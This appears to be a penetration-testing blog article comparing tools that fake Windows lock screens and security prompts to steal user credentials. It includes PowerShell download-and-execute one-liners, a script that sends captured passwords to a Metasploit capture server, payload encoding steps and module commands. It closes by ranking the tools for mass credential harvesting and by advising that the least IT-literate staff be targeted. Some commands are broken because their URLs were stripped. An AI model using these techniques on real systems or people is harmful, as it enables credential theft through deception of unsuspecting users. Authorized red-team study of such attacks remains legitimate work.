Windows Credentials Phishing

Windows Credentials Phishing

On Windows family operating systems, it is normal for some programs and processes to request user credentials for authentication (e.g. Outlook) to increase runtime privileges (User Account Control) or simply to exit the Windows LockScreen. Simulating this Windows behavior allows you to get user credentials and then apply them later in the penetration test. This article collects a digest of several common phishing programs via the LockScreen spoofing.


Modern pentesthetic techniques are often based on the C# programming language, as programs can be executed in it through various frameworks (Cobalt Strike, Covenant, etc.).

1) The utility The FakeLogonScreen was developed Arris Huijgen to C# and it not only replaces the standard OS password input screen, but does so using the standard screen parameters set in the system, which increases the chances of not being suspicious and successfully obtaining the user’s login credentials.

FakeLogonScreen – start
FakeLogonScreen – screen lock

When entering a password on the FakeLogonScreen’s login fake page, FakeLogonScreen will validate the credentials in AD or locally to determine exactly if the password was entered correctly. The password will then be displayed in the pentester console.

FakeLogonScreen – Credentials input

Also included in FakeLogonScreen is the second version of the executable file, which saves the caught credentials to user.db file locally on the infected machine. This file can be viewed using the type command:

type C:\Users\testTHUser3\AppData\Local\Microsoft\user.db
FakeLogonScreen – save to file user.db

2) The program SharpLocker developed by Matt Pickford. Once started, it also replaces the original login screen.

SharpLocker – screen lock

Each character entered by the user is intercepted until the entire password is found. It’s worth noting, however, that this utility doesn’t perform password authentication and will remove everything that the user enters into the password field.

SharpLocker – password phishing

Power Shell

Credentials queries from Windows security are very common, as software in an enterprise environment may regularly require additional action confirmation or reauthorization. Microsoft Outlook, for example, is one of the brightest representatives of such software that constantly requests domain credentials from users.

1. The utility that is masked as a Windows security request window is called CredsLeaker. For it to work properly, it requires a web server from which it will receive all the necessary files and where its user credentials will be saved, and PowerShell to send HTTP requests to its server. All commands in the future will be executed from the existing BAT file.

CredsLeaker – HTTP Delivery

Before running.bat file you should make all necessary changes in the configuration files of the utility. Once the run.bat file is run, the user will see a Windows Security window asking for his credentials.

CredsLeaker – phishing window

The query window will disappear only if valid user credentials are entered. The domain, computer name, username and password will be saved in the creds.txt file along the path below:

CredsLeaker – output to file creds.txt

2. Matt Nelson developed PowerShell script, which causes a window to query Windows Security credentials and then check their validity. This window also cannot be closed by the user until the actual credentials have been entered. This script can be executed remotely and the credentials entered will be displayed in the console on the “attacker” machine:

 powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('')); Invoke-LoginPrompt
Invoke-LoginPrompt – remote call
Invoke-LoginPrompt – phishing window

3. As part of the Nishang framework there is also PowerShell script, which creates a user account query window.

Import-Module C:\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish – local call and phishing window

The generated window will contain the information that this action requires confirmation in the form of account data input. More experienced IS users may suspect that this window is triggered by running an application in the background, but not everyone on the corporate network can have this knowledge. The credentials that the user enters into the dialog box will be displayed in the console.

Invoke-CredentialsPhish – output of collected data

This script can also be run remotely:

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('; Invoke-CredentialsPhish

Rob Fuller in his blog described an attack on phishing user credentials using Metasploit and PowerShell. The Metasploit Framework has modules that can capture user credentials from different protocols (FTP, SMB, HTTP, etc.). The module listed below is used to deploy a basic HTTP server with authentication:

use auxiliary/server/capture/http_basic

PowerShell is used to conduct a phishing attack on user credentials by generating a Windows Security prompt window and then transferring the collected credentials to an HTTP server previously created via Metasploit:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent", "Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object$cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('');

For the initial capture of credentials you need to use UTF-16LE encoding followed by Base64 conversion:

cat popup.txt | iconv -t UTF-16LE
 cat popup.txt | iconv -t UTF-16LE | base64 -w0
Conversion of code into Base64

Executing this code, either locally or remotely, will cause the user to be prompted for authorization, supposedly by Windows Security.

powershell.exe -ep bypass -enc <base64> 
Credentials Phishing Window

The Metasploit module will receive the credentials as soon as they are entered by the user.

Metasploit HTTP Server – getting credentials


The Metasploit Framework has a module that can call the Windows Security window with a request for authorization from almost any process in the system. For correct work of this module, you need to specify the working session and the process, on behalf of which the Windows Security keylogger will be called.

use post/windows/gather/phish_windows_credentials
Metasploit Module – configuration

In this case, the * character tells the module to monitor all processes that are started on behalf of the system (NT Authority\System) and calls up a dialog box when a new process is started on behalf of the system.

Metasploit Module – monitoring all processes

As soon as the new process starts, the user will be presented with a dialog box on behalf of this process asking for authorization to allegedly confirm further work.

Metasploit Module – phishing window

As soon as the user enters the credentials, they will be immediately displayed in the Metasploit console.

Metasploit Module – getting credentials

This module can also be configured to wait for a specific process to start.

Metasploit Module – obtaining credentials through the process notepad.exe



Lockphish is another utility that can perform a phishing attack that spoofs the Windows logon window. The login window temple is stored on a PHP server and uses YouTube by default to redirect the user after entering his login and password.

LockPhish – start

At this stage, it will be necessary to resort to social engineering to lure the user to the website where the lock screen files are located.

LockPhish – file download

Unlike all other utilities, the location of the items on this lock screen may not be accurate, the authorization request will be displayed as Administrator, not as the current user account, and the lock screen will be stylized as Windows 10 Lockscreen. All of this can be very intimidating to the user. This utility also has no mechanisms to validate the password entered.

LockPhish – lock screen

After the user has entered their credentials, a redirect to will be performed.

LockPhish – redirect

Credentials will be displayed in the console.

LockPhish – collected credentials

The methods presented in this article will be effective if the pentester has already managed to gain a foothold in the system (get a stable login point), but it is not possible to increase privileges or get user credentials in another way. When conducting such phishing attacks, you should select the target audience very carefully. Efficiency will be many times higher if the target is the least IT literate people in the organization.

Short verdict on all tested software


    • FakeLogonScreen. Looks as plausible as possible, using the standard parameters set in the system. It is able to validate the entered credentials. (Best choice)
    • SharpLocker. Don’t authenticate, standard windows wallpaper for LockScreen is used, the layout of the lock screen itself goes slightly to the right, which may alert the user. (Not recommended if you can apply FakeLogonScreen)


    • CredsLeaker. Easy to execute, generates an authentic window, but requires a web server to work. If you need to run one user at a time, then the presence of web-ser is rather a minus, if it is possible to run the script on all computers in the domain and mass “comb” the credentials, the web-server is certainly a plus. (Recommended for mass gathering of credentials)


    • Invoke-LoginPrompt. Invoke-LoginPrompt. Easy to implement, suitable for point application, the window to be created is stylized for old or server versions of Windows. It may be suspicious to the user. (Recommended for use, but with caution)


  • Invoke-CredentialsPhish. Same as the patient above.
  • Script from Rob Fuller. Integration with metasploit, possibility of mass application, light dancing with tambourine as a conversion. (Also great for mass data collection)
  • .
  • Metasploit module phish_windows_credentials.Full integration with Metasploit (still a module), created window of the old version. (Applicable, but consider the IT literacy of the victim)
  • .
  • LockPhish. On the one hand – a curved lockscreen, without authentication, and also without the current user (Always asks for password from Administrator). On the other hand – the only one that can work through a browser. Send the victim the link and wait. (It’s not recommended to use out of the box, but if you know the login of a particular victim, reconfigure it from Adminnistrator to Adminnistrator and it won’t be so bad anymore. It might even work).


WARNING! All links in the articles may lead to malicious sites or contain viruses. Follow them at your own risk. Those who purposely visit the article know what they are doing. Do not click on everything thoughtlessly.


0 0 vote
Article Rating
Notify of
Inline Feedbacks
View all comments

Do NOT follow this link or you will be banned from the site!
Would love your thoughts, please comment.x

Spelling error report

The following text will be sent to our editors: